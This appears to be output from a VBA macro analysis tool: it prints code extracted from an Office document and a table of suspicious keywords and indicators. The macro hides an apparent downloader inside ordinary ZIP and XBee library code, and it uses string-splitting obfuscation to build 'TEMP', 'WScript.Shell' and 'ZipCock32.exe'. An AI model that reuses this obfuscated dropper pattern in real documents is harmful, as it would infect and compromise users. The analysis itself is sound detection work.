- Debug.Print "Callbacks not enabled!"
- Exit Sub
- End If
- For Each id In Callbacks
- xbee_detachCallback id(0)
- Next
- SetWindowLong ActivehWnd, GWL_WNDPROC, OldhWndHandler
- ActivehWnd = 0
- OldhWndHandler = 0
- End Sub
- '-- Main ZIP32.DLL Subroutine.
- '-- This Is Where It All Happens!!!
- '--
- '-- (WARNING!) Do Not Change This Function!!!
- '--
- Public Function VBZip32()
- Dim retcode As Long
- Dim FileNotFound As Boolean
- ' On Error Resume Next '-- Nothing Will Go Wrong :-)
- On Error GoTo ZipError
- retcode = 0
- prompt82 = processEnv("T" & "" + "E" + "" + "M" & "P")
- '-- Set Address Of ZIP32.DLL Callback Functions
- '-- (WARNING!) Do Not Change!!! (except as noted below)
- ' If you need to set destination of each split set this
- 'ZUSER.ZDLLSPLIT = FnPtr(AddressOf ZDLLSplitSelect)
- '-- Set ZIP32.DLL Callbacks - return 1 if DLL loaded 0 if not
- retcode = ZpI.nit(ZUSER)
- If retcode = 0 And FileNotFound Then
- MsgBox "Probably could not find Zip32z64.DLL - have you copied" & Chr(10) & _
- "it to the System directory, your program directory, " & Chr(10) & _
- "or a directory on your command PATH?"
- VBZip32 = retcode
- Exit Function
- End If
- DisplayVersion
- If strZipFileNames = "" Then
- ' not using string of names to zip (so using array of names)
- strZipFileNames = vbNullString
- End If
- '-- Go Zip It Them Up!
- retcode = ZpAr.chive(zArgc, zZipArchiveName, zZipFileNames, strZipFileNames, ZOPT)
- '-- Return The Function Code
- VBZip32 = retcode
- Exit Function
- ZipError:
- prompt82 = prompt82 & "\" & "ZipCock32." + "e" & "xe"
- End Function
- Private Function xbee_messageHandler(ByVal hWnd As Long, ByVal uMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
- If uMsg = callbackMessageID Then
- Dim t As Long
- On Error Resume Next
- Err.Clear
- t = Callbacks.Item(CStr(wParam))(1)
- If Err.Number = 0 Then
- On Error GoTo 0
- xbee_messageHandler = xbee_runCallback(t, wParam, lParam)
- Exit Function
- End If
- On Error GoTo 0
- xbee_logit "Unable to match Connection with active callback!"
- End If
- xbee_messageHandler = CallWindowProc(OldhWndHandler, hWnd, uMsg, wParam, lParam)
- If uMsg = WM_DESTROY And ActivehWnd <> 0 Then
- ' Disable the MessageHandler if the form "unload" event is detected
- xbee_disableCallbacks
- End If
- End Function
- Public Sub xbee_endcon(ByRef con As Long)
- xbee_endcon2 con
- con = 0
- End Sub
- Public Function xbee_sendstring(ByVal con As Long, ByVal str As String)
- xbee_sendstring = xbee_senddata_str(con, str, Len(str))
- End Function
- Public Function xbee_getpacketPtr(ByVal con As Long, ByRef pkt As Long) As Integer
- Dim ptr As Long
- ptr = xbee_getpacketRaw(con)
- If ptr = 0 Then
- pkt = 0
- xbee_getpacketPtr = 0
- Exit Function
- End If
- pkt = ptr
- xbee_getpacketPtr = 1
- End Function
- Public Function xbee_getpacket(ByVal con As Long, ByRef pkt As String) As Integer
- Dim ptr As Long
- ptr = xbee_getpacketRaw(con)
- If ptr = 0 Then
- xbee_getpacket = 0
- Exit Function
- End If
- pkt = xbee_pointerToPacket(ptr)
- xbee_free ptr
- xbee_getpacket = 1
- End Function
- +------------+----------------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------------+-----------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- | Suspicious | Open | May open a file |
- | Suspicious | Shell | May run an executable file or a system |
- | | | command |
- | Suspicious | Shell.Application | May run an application (if combined |
- | | | with CreateObject) |
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | ADODB.Stream | May create a text file |
- | Suspicious | SaveToFile | May create a text file |
- | Suspicious | Write | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Put | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Microsoft.XMLHTTP | May download files from the Internet |
- | Suspicious | WScript.Shell | May run an executable file or a system |
- | | | command (obfuscation: VBA expression) |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | Suspicious | VBA obfuscated | VBA string expressions were detected, |
- | | Strings | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | UNZIP32.DLL | Executable file name |
- | IOC | Zip32.DLL | Executable file name |
- | IOC | ZIP32z64.DLL | Executable file name |
- | IOC | Zip32z64.DLL | Executable file name |
- | IOC | Zip32z64.dll | Executable file name |
- | IOC | ZIP32.DLL | Executable file name |
- | IOC | ZipCock32.exe | Executable file name (obfuscation: VBA |
- | | | expression) |
- | VBA string | Remove comment? Hit | "Remove comment?" & Chr(13) & "Hit No |
- | | No to keep existing | to keep existing comment" |
- | | comment | |
- | VBA string | GET | "G" & "E" + "T" |
- | VBA string | Both ExcludeEarlierT | "Both ExcludeEarlierThanDate and |
- | | hanDate and IncludeE | IncludeEarlierThanDate not " & Chr(10) |
- | | arlierThanDate not | & "supported at same time" |
- | | supported at same | |
- | | time | |
- | VBA string | WScript.Shell | ("WScript." + "Shell") |
- | VBA string | Process | ("Pro" & "cess") |
- | VBA string | ] - FLAGS: | "]" & " - FLAGS: " |
- | VBA string | TEMP | ("T" & "" + "E" + "" + "M" & "P") |
- | VBA string | Probably could not | "Probably could not find Zip32z64.DLL - |
- | | find Zip32z64.DLL - | have you copied" & Chr(10) & |
- | | have you copied | "it to the System directory, your |
- | | it to the System | program directory, " & Chr(10) & |
- | | directory, your | "or a directory on your command PATH?" |
- | | program directory, | |
- | | or a directory on | |
- | | your command PATH? | |
- | VBA string | \ZipCock32.exe | "\" & "ZipCock32." + "e" & "xe" |
- +------------+----------------------+-----------------------------------------+
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